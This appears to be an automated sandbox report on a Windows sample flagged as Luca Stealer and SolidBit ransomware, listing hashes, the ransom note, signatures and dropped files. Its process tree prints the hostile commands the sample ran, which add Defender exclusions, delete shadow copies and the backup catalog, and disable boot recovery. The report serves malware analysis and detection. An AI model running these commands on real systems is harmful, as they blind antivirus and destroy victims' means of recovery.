Overview

overview

10

Static

static

1

4bc5ade40a...5b.exe

windows7-x64

10

4bc5ade40a...5b.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-03-2023 01:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe

  • Size

    5.6MB

  • MD5

    bded213b6ad8b501a9a8769498c06858

  • SHA1

    3927ded7ffee7ab8f400d00bcb3b5479ffa3abfb

  • SHA256

    4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b

  • SHA512

    01fae25d7d0865ea0bd3b2f4d8f51d192a3ae9b7af5ab23ea55b34cadc3618ad66f53aec865776a50c98a7fb8076e71335d180ebf6e8ad02cf4a74799d780ee3

  • SSDEEP

    98304:QxD6iw63xsDaup/EMGVxpE581oyzEY6JvRdZjYZPqXEla15YYO:QR6b6+HE25ZyzEX9jaqzv2

Score
10/10
lucastealerevasionpersistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\Users\Admin\3D Objects\RESTORE-MY-FILES.txt

Ransom Note
***SOLIDBIT RANSOMWARE*** All of your files are encrypted by SOLIDBIT ransomware and you cannot decrypt it without our help. If you try to use any additional recovery software - the files might be damaged, so if you are willing to try - try it on the data of the lowest value. To make sure that we REALLY CAN recover data - we offer you to decrypt samples. You can recover all your files safely and easily with us. Contact Download Tor Browser - https://www.torproject.org/download/ and install it Open the link below in Tor Browser and follow instructions on this page http://solidb2jco63vbhx4sfimnqmwhtdjk4jbbgq7a24cmzzkfse4rduxgid.onion Decryption ID: 5-LIZ6O2V36BS2J7E274A7UW6OEP1Ok8
URLs

http://solidb2jco63vbhx4sfimnqmwhtdjk4jbbgq7a24cmzzkfse4rduxgid.onion

Signatures

  • Luca Stealer

    Info stealer written in Rust first seen in July 2022.

    stealerlucastealer
  • Luca Stealer payload 2 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops desktop.ini file(s) 64 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe
    "C:\Users\Admin\AppData\Local\Temp\4bc5ade40ab56113ce9709c0da15416628e089e838864a6756ceca90b8ffaf5b.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Enumerates system info in registry
    • Suspicious use of WriteProcessMemory
    PID:2104
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Loading Rust Components. It can take up to 5 minutes, please wait.','Error','OK','Error')"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:628
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Loading Rust Components. It can take up to 5 minutes, please wait.','Error','OK','Error')"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1724
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3936
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1208
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4200
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\LoL Checker x64.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2720
      • C:\Users\Admin\AppData\Local\Temp\LoL Checker x64.exe
        "C:\Users\Admin\AppData\Local\Temp\LoL Checker x64.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:928
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:892
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4604
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4236
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\Runtime64.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:208
          • C:\Users\Admin\AppData\Local\Temp\Runtime64.exe
            "C:\Users\Admin\AppData\Local\Temp\Runtime64.exe"
            5⤵
            • Modifies extensions of user files
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops desktop.ini file(s)
            • Suspicious use of WriteProcessMemory
            PID:5048
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4424
              • C:\Windows\system32\vssadmin.exe
                vssadmin delete shadows /all /quiet
                7⤵
                • Interacts with shadow copies
                PID:2304
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic shadowcopy delete
                7⤵
                  PID:3892
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                6⤵
                  PID:2420
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} bootstatuspolicy ignoreallfailures
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:3864
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} recoveryenabled no
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:4828
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                  6⤵
                    PID:680
                    • C:\Windows\system32\wbadmin.exe
                      wbadmin delete catalog -quiet
                      7⤵
                      • Deletes backup catalog
                      PID:1112
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\LoL Account Checker.exe"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1488
            • C:\Users\Admin\AppData\Local\Temp\LoL Account Checker.exe
              "C:\Users\Admin\AppData\Local\Temp\LoL Account Checker.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:1860
        • C:\Windows\system32\vssvc.exe
          C:\Windows\system32\vssvc.exe
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2360
        • C:\Windows\system32\wbengine.exe
          "C:\Windows\system32\wbengine.exe"
          1⤵
            PID:3056
          • C:\Windows\System32\vdsldr.exe
            C:\Windows\System32\vdsldr.exe -Embedding
            1⤵
              PID:5036
            • C:\Windows\System32\vds.exe
              C:\Windows\System32\vds.exe
              1⤵
                PID:1684

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\3D Objects\RESTORE-MY-FILES.txt
                Filesize

                727B

                MD5

                b772c9fd7ea993e0fc264fad8a817a0f

                SHA1

                684222a5df722e50fcd38eac319e6d2f18bea20a

                SHA256

                9aa4a2574e764938ea6b2a422d579718e9035aa81f5c3798fa7c7f63fef7c097

                SHA512

                85c5a03bb8d5a65304670cefdee0258868af7b4e7b65808abe04423867a680e2b38d2befefee92407142e55e6e3ae26c51c3f62d0422d503acdd18073b28b88b

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                Filesize

                1KB

                MD5

                4cc9e7069534f7bcbb90ad7cac69ed78

                SHA1

                a3522b9edd4a7d28ad0ac0e1b659a82b6dc10892

                SHA256

                4814be12fd2320cd9249d3b2611ea1421cb88823097fcbf0ca697e6e9ac93c9c

                SHA512

                e408e0abb3b7166578c075d10f1378d6a6b39dc386361a4df23abc026e9a634bfb16c01daf9b8fcbe8555e335d93c8c9d8442a11c187df616f2d6cdd3ab53653

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                18KB

                MD5

                d350ad306e3d53c13c73713d34b8a59b

                SHA1

                9758d3282093e2e34505cb5546ad8a129bbdc2be

                SHA256

                ba13d5e3765664e067410fbd2aa56e2febf85045c273e06dee8ecd2f673efaff

                SHA512

                a8b096fd8e08e5ed32133088a08c4f6c47bd1af00ba1a39081fdcf422d79b57f57c9c971e210ae5d470c2699e12cd2decc069f215ae05b837b51c82756f6bd58

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                18KB

                MD5

                d350ad306e3d53c13c73713d34b8a59b

                SHA1

                9758d3282093e2e34505cb5546ad8a129bbdc2be

                SHA256

                ba13d5e3765664e067410fbd2aa56e2febf85045c273e06dee8ecd2f673efaff

                SHA512

                a8b096fd8e08e5ed32133088a08c4f6c47bd1af00ba1a39081fdcf422d79b57f57c9c971e210ae5d470c2699e12cd2decc069f215ae05b837b51c82756f6bd58

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                18KB

                MD5

                87f8360ec7867115130e97a7d19ff049

                SHA1

                cc796a6ae8ad106804c0687d5ec148f55f6cf9b2

                SHA256

                5e7d975fcef192fb74806e5c1a75381148998f0adc23b156f10535425180e50a

                SHA512

                6f56173d67932dae8a04f035801f84c396f9d54a51bcff0f37e2e914adf4b260c5e94de6181415c64535a1324530dd5248c22fab6b5ebf36fe8369c2aa52760d

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                18KB

                MD5

                e7aaf374b661e540f19b374e7499df16

                SHA1

                ef126c5e7d8ebbf317a7a6e3cb73260614b1b7e4

                SHA256

                3f840f3513e838188b61e97a825272ccb4d49a9a99b1f07cf1882d08eae84868

                SHA512

                d300213af738cdd82b195713d1a3f7f9f67741c5fe580615e20e67f480d4d147d9885202d1952ff690200777e6b4b3898aa07bc5ca391cc70742c00f687a35b0

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\LoL Account Checker.exe
                Filesize

                4.2MB

                MD5

                737d5f15ce6f25fd35748317f418228e

                SHA1

                ce770614c55fd78247e81073739a65a4859af95a

                SHA256

                05e13b81086568e323aa2a00d3c63f8df46f679a1d22a7a35062384f51342820

                SHA512

                4913be2a1797ffc4b6be68a95bde091897a31490aec701580bf9978f5a76b3bc3d69655e500dac97ff5776d1325c97fe0ceae66982b84179f05ffd30ff4c3c9e

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\LoL Account Checker.exe
                Filesize

                4.2MB

                MD5

                737d5f15ce6f25fd35748317f418228e

                SHA1

                ce770614c55fd78247e81073739a65a4859af95a

                SHA256

                05e13b81086568e323aa2a00d3c63f8df46f679a1d22a7a35062384f51342820

                SHA512

                4913be2a1797ffc4b6be68a95bde091897a31490aec701580bf9978f5a76b3bc3d69655e500dac97ff5776d1325c97fe0ceae66982b84179f05ffd30ff4c3c9e

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\LoL Checker x64.exe
                Filesize

                257KB

                MD5

                872be464e8b07144dd04ead953d26fec

                SHA1

                6908505f45adf61875f78e4e3e374da2d380b3b8

                SHA256

                42105689f3974b93b06d56c81d4a6852e0ab7759eaa63834941be7ad4290ff60

                SHA512

                a9b082aea81a7801f77588ba8834b71ddbd64f43169e9f381f8f43145470e3ed5442551e2483e2c88b7a596d5ccf9cfeb3f5d900ce2c4baa2a6742baa924f5a4

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\LoL Checker x64.exe
                Filesize

                257KB

                MD5

                872be464e8b07144dd04ead953d26fec

                SHA1

                6908505f45adf61875f78e4e3e374da2d380b3b8

                SHA256

                42105689f3974b93b06d56c81d4a6852e0ab7759eaa63834941be7ad4290ff60

                SHA512

                a9b082aea81a7801f77588ba8834b71ddbd64f43169e9f381f8f43145470e3ed5442551e2483e2c88b7a596d5ccf9cfeb3f5d900ce2c4baa2a6742baa924f5a4

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\Runtime64.exe
                Filesize

                252KB

                MD5

                3c9bd0d16cea39a29132136d93c0b2ec

                SHA1

                5ffdf5cb39cc0e51753843e9e0aa14a201472fe4

                SHA256

                f96e95622e7ef19947169f534f792b660cf9ba8209a3b5de0ff7a22e2d5b1e86

                SHA512

                314cccc5f00952d19819363342a149fae3ca73db1bff31253a267142537890ea6fab7461c25ff5d0bf530631beac477905ee93a06ef3fafd98ee398bf3aa9fd4

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\Runtime64.exe
                Filesize

                252KB

                MD5

                3c9bd0d16cea39a29132136d93c0b2ec

                SHA1

                5ffdf5cb39cc0e51753843e9e0aa14a201472fe4

                SHA256

                f96e95622e7ef19947169f534f792b660cf9ba8209a3b5de0ff7a22e2d5b1e86

                SHA512

                314cccc5f00952d19819363342a149fae3ca73db1bff31253a267142537890ea6fab7461c25ff5d0bf530631beac477905ee93a06ef3fafd98ee398bf3aa9fd4

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o2nerp0g.gp2.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit

              • C:\Users\Admin\AppData\Local\logsxc\screen-1.png
                Filesize

                214KB

                MD5

                4b8c1527092fcdb4b3743ba7234e41be

                SHA1

                fddeb8c06741145b2ca7dfd0267855fdf1e7db56

                SHA256

                2e37da2244ce77f4c0d78e372e81533a43ce58d379e1ac5346d09b332935790a

                SHA512

                53f37fa3d9b25e9372397b1f402342ad3fafc27af5d9bb33c141bbec6832499cac48cfb20b4c93d59dd14b896e0049e14309301885af91da9815f032022d4856

                Download Submit

              • C:\Users\Admin\Desktop\DismountAssert.lnk
                Filesize

                1B

                MD5

                d1457b72c3fb323a2671125aef3eab5d

                SHA1

                5bab61eb53176449e25c2c82f172b82cb13ffb9d

                SHA256

                8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1

                SHA512

                ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

                Download Submit

              • memory/1208-6730-0x0000000007790000-0x000000000779A000-memory.dmp

                Filesize

                40KB

                Download

              • memory/1208-6734-0x0000000007960000-0x000000000796E000-memory.dmp

                Filesize

                56KB

                Download

              • memory/1208-6712-0x00000000050D0000-0x00000000050E0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1208-6686-0x0000000005710000-0x0000000005D38000-memory.dmp

                Filesize

                6.2MB

                Download

              • memory/1208-6685-0x00000000050D0000-0x00000000050E0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1208-6715-0x00000000069B0000-0x00000000069E2000-memory.dmp

                Filesize

                200KB

                Download

              • memory/1208-6716-0x0000000070720000-0x000000007076C000-memory.dmp

                Filesize

                304KB

                Download

              • memory/1208-6726-0x0000000006990000-0x00000000069AE000-memory.dmp

                Filesize

                120KB

                Download

              • memory/1208-6683-0x00000000050D0000-0x00000000050E0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1208-6728-0x000000007F9A0000-0x000000007F9B0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1208-6688-0x00000000054D0000-0x0000000005536000-memory.dmp

                Filesize

                408KB

                Download

              • memory/1208-6681-0x0000000002E10000-0x0000000002E46000-memory.dmp

                Filesize

                216KB

                Download

              • memory/1208-6731-0x00000000079B0000-0x0000000007A46000-memory.dmp

                Filesize

                600KB

                Download

              • memory/1208-6687-0x0000000005420000-0x0000000005442000-memory.dmp

                Filesize

                136KB

                Download

              • memory/1208-6735-0x0000000007A50000-0x0000000007A6A000-memory.dmp

                Filesize

                104KB

                Download

              • memory/1208-6736-0x00000000079A0000-0x00000000079A8000-memory.dmp

                Filesize

                32KB

                Download

              • memory/1208-6689-0x0000000005540000-0x00000000055A6000-memory.dmp

                Filesize

                408KB

                Download

              • memory/1724-6711-0x0000000005440000-0x0000000005450000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1724-6682-0x0000000005440000-0x0000000005450000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1724-6708-0x00000000056F0000-0x000000000570E000-memory.dmp

                Filesize

                120KB

                Download

              • memory/1724-6729-0x0000000007B40000-0x0000000007BD2000-memory.dmp

                Filesize

                584KB

                Download

              • memory/1724-6727-0x0000000008C00000-0x00000000091A4000-memory.dmp

                Filesize

                5.6MB

                Download

              • memory/1724-6684-0x0000000005440000-0x0000000005450000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1724-6714-0x0000000006E90000-0x0000000006EAA000-memory.dmp

                Filesize

                104KB

                Download

              • memory/1724-6713-0x0000000007FD0000-0x000000000864A000-memory.dmp

                Filesize

                6.5MB

                Download

              • memory/2104-133-0x0000000000400000-0x0000000000992000-memory.dmp

                Filesize

                5.6MB

                Download

              • memory/2104-3077-0x0000000075AF0000-0x0000000075B6A000-memory.dmp

                Filesize

                488KB

                Download

              • memory/2104-6674-0x0000000002980000-0x00000000029FC000-memory.dmp

                Filesize

                496KB

                Download

              • memory/2104-2072-0x00000000769A0000-0x0000000076B40000-memory.dmp

                Filesize

                1.6MB

                Download

              • memory/2104-134-0x0000000075F20000-0x0000000076135000-memory.dmp

                Filesize

                2.1MB

                Download

              • memory/2104-6672-0x0000000000400000-0x0000000000992000-memory.dmp

                Filesize

                5.6MB

                Download

              • memory/4200-6762-0x0000000005270000-0x0000000005280000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4200-6763-0x000000007F840000-0x000000007F850000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4200-6751-0x0000000005270000-0x0000000005280000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4200-6750-0x0000000005270000-0x0000000005280000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4200-6752-0x0000000070720000-0x000000007076C000-memory.dmp

                Filesize

                304KB

                Download

              • memory/4236-7430-0x0000000004F80000-0x0000000004F90000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4236-7794-0x00000000707C0000-0x000000007080C000-memory.dmp

                Filesize

                304KB

                Download

              • memory/4236-7804-0x000000007F6A0000-0x000000007F6B0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4236-7772-0x0000000004F80000-0x0000000004F90000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4236-7428-0x0000000004F80000-0x0000000004F90000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4604-6780-0x0000000003050000-0x0000000003060000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4604-7056-0x0000000003050000-0x0000000003060000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4604-6781-0x0000000003050000-0x0000000003060000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4604-6904-0x00000000707C0000-0x000000007080C000-memory.dmp

                Filesize

                304KB

                Download

              • memory/5048-7062-0x000000001B200000-0x000000001B210000-memory.dmp

                Filesize

                64KB

                Download

              • memory/5048-7045-0x000000001B200000-0x000000001B210000-memory.dmp

                Filesize

                64KB

                Download

              • memory/5048-6769-0x00000000002F0000-0x0000000000334000-memory.dmp

                Filesize

                272KB

                Download

              • memory/5048-7806-0x000000001B200000-0x000000001B210000-memory.dmp

                Filesize

                64KB

                Download

              • memory/5048-7808-0x000000001B200000-0x000000001B210000-memory.dmp

                Filesize

                64KB

                Download

              • memory/5048-7810-0x000000001B200000-0x000000001B210000-memory.dmp

                Filesize

                64KB

                Download